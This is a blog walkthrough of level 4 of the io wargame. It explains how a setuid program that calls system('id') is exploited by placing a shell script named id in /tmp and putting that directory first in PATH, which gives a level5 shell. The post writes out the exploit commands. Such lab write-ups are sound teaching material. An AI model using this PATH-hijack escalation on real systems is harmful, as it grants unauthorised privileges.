onHacks

Welcome to level 4. In my opinion, this is easier than the previous levels if you have knowledge on how exectuables are being looked for in OS. You have been given both executable and source code again. When we first run the program, the following result is shown.

level4@io:/levels$ ./level4
uid=1004(level4) gid=1004(level4) euid=1005(level5) groups=1004(level4),1029(nosu)

Looks like it is running the command id.

The id command lists the real and effective user IDs and the group IDs of the user associated with the current process. This is the counterpart to the $UID, $EUID, and $GROUPS internal Bash variables. The id command shows the effective IDs only when they differ from the real ones. – From webtools.live2support.com

You can confirm it by looking at its source code. And yes, it does have a statement

system(“id”);

which call the Linux command.

If you are familiar with this command enough, actually it is just a piece of executable which is usually located at /bin/. But why you can run the command by just typing “id“, not “/bin/id“? It is because we have environment variable in our OS. In *nix system, it is PATH, you can use echo $PATH to see what is the current value of it.

level4@io:/levels$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/games

So what we are going to do at this level are:

1. Create a piece of code or script that call “/bin/sh“
2. Redirect the “id” command to run your script
3. Execute level4 executable

Why this works because the level4 executable has euid = level5, see definition of euid. If we bring up a shell from this executable, the shell will have level5 permission automatically. Amazing enough?

Actually you can only create code or scripts under /tmp/. We can do the following to create a script their.

level4@io:/levels$ mkdir /tmp/onhacks/
level4@io:/levels$ echo “/bin/sh” > /tmp/onhacks/id
level4@io:/levels$ chmod +x /tmp/onhacks/id

Next step is to change the environment variable by running:

level4@io:/levels$ PATH=/tmp/onhacks:/usr/bin:/bin:/usr/games

Now, you are ready to grant the access next level. Remember to grab the password for level 5. It reminds us to utilitze what you learn, even a little trick can break a big hole. Think creatively and diversely.

See you in level 5.

Note:

1. Other option: You can replace the script with a piece of C code which execute execl(“/bin/sh”);
2. Your changes on environment variable will not affect others, it is scoped in the current session.